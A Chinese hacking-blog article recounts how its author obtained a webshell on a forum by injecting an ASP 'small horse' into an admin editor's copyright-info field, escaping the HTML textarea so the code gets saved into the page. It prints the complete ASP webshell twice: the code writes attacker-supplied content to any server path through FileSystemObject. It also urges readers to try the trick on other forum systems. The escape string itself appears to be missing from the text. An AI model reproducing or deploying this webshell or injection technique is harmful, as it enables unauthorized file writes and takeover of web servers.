欢迎来到福编程网,本站提供各种互联网专业知识!

编辑器代码逃逸漏洞 by蚊虫原创

发布时间:1970-01-01 作者:佚名 来源:互联网
几天冰刀丢给我一个论坛这几天无聊随便看看看看能不能拿到webshell

好 版权信息 把他变成小马

成功保存

但是没有被执行..

应该是马的问题

马儿不行 当然是更换了 这不 怪事出现了 你看..

看 命令成功完成! 非法操作! 这这么跑出来了?????????????

真是怪了难道我的马儿真的长褪了?

研究了一下中以明白是怎么回事了..

看看我的马儿的代码,注意红色的标记

" size="53">

蚊虫专用

<%

dim objFSO

dim fdat

dim objCountFile

on error resume next

Set objFSO = Server.CreateObject("Scripting.FileSystemObject")

if Trim(request("syfdpath"))<>"" then

fdata = request("cyfddata")

Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)

objCountFile.Write fdata

if err =0 then %>

命令成功完成!

<% else %>

非法操作!

<%

end if

err.clear

end if

objCountFile.Close

Set objCountFile=Nothing

Set objFSO = Nothing

%>

再看看网页的源代码,注意橙色的标记

论坛版权信息

<%

dim objFSO

dim fdat

dim objCountFile

on error resume next

Set objFSO = Server.CreateObject("Scripting.FileSystemObject")

if Trim(request("syfdpath"))<>"" then

fdata = request("cyfddata")

Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)

objCountFile.Write fdata

if err =0 then %>

命令成功完成!

<% else %>

非法操作!

<%

end if

err.clear

end if

objCountFile.Close

Set objCountFile=Nothing

Set objFSO = Nothing

%>

看不明白?

我来解释一下

看网页的源代码

所以浏览器就把

以下的代码解释为文本框以外的位置了...

呵呵 这就相当于把 以下的代码 写进了这个编辑页面里面...

明白了吧

这对我们很有用处

使用

在小马最上面加上

保存

然后重新编辑

这时 我们的小马已经被'写入"编辑页面

剩下的就不用说了吧.....哈哈 淫荡去咯....

ps:不光是动网 还有其他的系统都有类似的漏洞

ps:不要吧思维光死停留在这里..想想我们可以.....

PS:有可能运行不了,这取决于你的马.

相关推荐